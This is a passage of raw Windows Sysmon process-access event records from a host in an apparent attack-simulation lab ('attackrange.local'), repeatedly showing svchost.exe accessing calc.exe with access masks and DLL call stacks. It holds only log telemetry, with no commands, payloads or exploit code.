10341000x8000000000000000360910Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360909Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360908Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360907Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360906Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360905Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360904Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360903Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360902Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360901Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360900Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360899Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360898Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360897Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360896Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360895Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360894Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360893Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360892Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360891Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360890Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360889Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dl